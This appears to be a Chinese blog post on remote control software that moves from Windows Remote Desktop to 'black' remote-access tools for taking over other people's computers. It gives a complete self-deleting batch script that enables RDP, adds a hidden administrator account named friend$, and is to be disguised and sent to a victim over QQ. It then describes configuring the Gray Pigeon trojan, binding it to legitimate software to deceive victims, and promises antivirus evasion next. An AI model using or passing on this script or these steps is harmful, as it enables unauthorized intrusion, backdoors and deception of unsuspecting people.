绿色远控
一、电脑自带的远程桌面
Windows系统的电脑都会自带远程桌面的功能,这里以windows7为例。打开方法有以下两种:
1.win+R调出运行窗口————输入mstsc;
2.win7的开始菜单直接搜索远程桌面,或者win8/10系统按住win+Q搜索远程桌面。
输入对方的ip地址即可进行连接,输入账户密码即可以登录主机使用。
局限性:这种方法虽然简单稳定,但是前提是对方要在我的电脑————属性————远程控制————勾选允许运行任意版本的计算机连接(也就是开启3389端口,后面会教你如何用命令开启他人的3389端口);另外,这种连接只能用于局域网的主机。
优点:方便稳定,尤其是在校园网中,不需要拨号只要插上网线都可以连接。因为学校的网线都是在学校的内网下,属于同一个局域网。
二、第三方软件
除此之外,也可以用第三方软件。比如:
所以说只要你有足够的时间去接近和使用别人的电脑就可以轻松在上面安装一个控制软件,让他成为你的肉鸡。但是前提是除了亲近的人,谁又会愿意让你一个人玩他的电脑呢。。。
一般来说,网上能够下载的官方远控软件都是跟上述的两个大同小异。作为个人的设备集中管理非常方便好用,但是不能作为攻击工具去入侵别人的电脑。下面将会介绍几款黑色远控!
黑色远控
一、远程开启3389.
将以下这段代码复制到一个记事本中重命名为control.bat(查看后缀名,在文件夹选项中开启)
@echo off echo Windows Registry Editor Version 5.00>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg echo "fDenyTSConnections"=dword:00000000>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg regedit /s 3389.reg net user friend$ hack /add net localgroup administrators friend$ /add del 3389.reg del control.bat
然后伪装图标等等之后通过qq发给对方,对方双击后,文件会自动运行并且删除,然后要是你们是局域网的话就可以开始愉快的远控了。
二、黑产远控软件的使用
灰鸽子
步骤:
先下载灰鸽子软件,大家没有的可以下载灰鸽子软件的
打开后灰鸽子,我们先点击ftp更新我们的动态域名
更新成功在打开配置服务端,写上更新好的域名
这里是运行后服务端释放的目录,大家根据自己的要求来写
这个是选择用什么进程的名字,我这个是使用ie进程
配置好后,就是有一个Server.exe,运行后就可以在主控端里面看到了
主控端显示的界面就是这样的
生成服务端,发给你的肉鸡,他双击后你就可以进行控制了。
但是这种服务端是不是看起来很容易被识破,发给人家了谁会这么傻去双击啊。所以说,这个时候我们应该给服务端做一个捆绑,也就是加壳。自己去网上下载一个捆绑工具,这里不做演示。
打开捆绑工具,将正常的软件作为主文件,木马也就是我们的服务端作为捆绑文件,进行捆绑命名。比如说我这个取一个迷惑人的名字,别人打开之后就会运行捆绑的两个软件,不会被怀疑了。
但是综上所述,虽然黑控软件千千万,但是现在的杀毒软件都做得非常的好,你的服务端一被接受就会被杀毒软件干掉,所以说做到免杀是一个非常关键的一环。在下一个博客,我们将会来探讨如何做到免杀!绕过安全狗。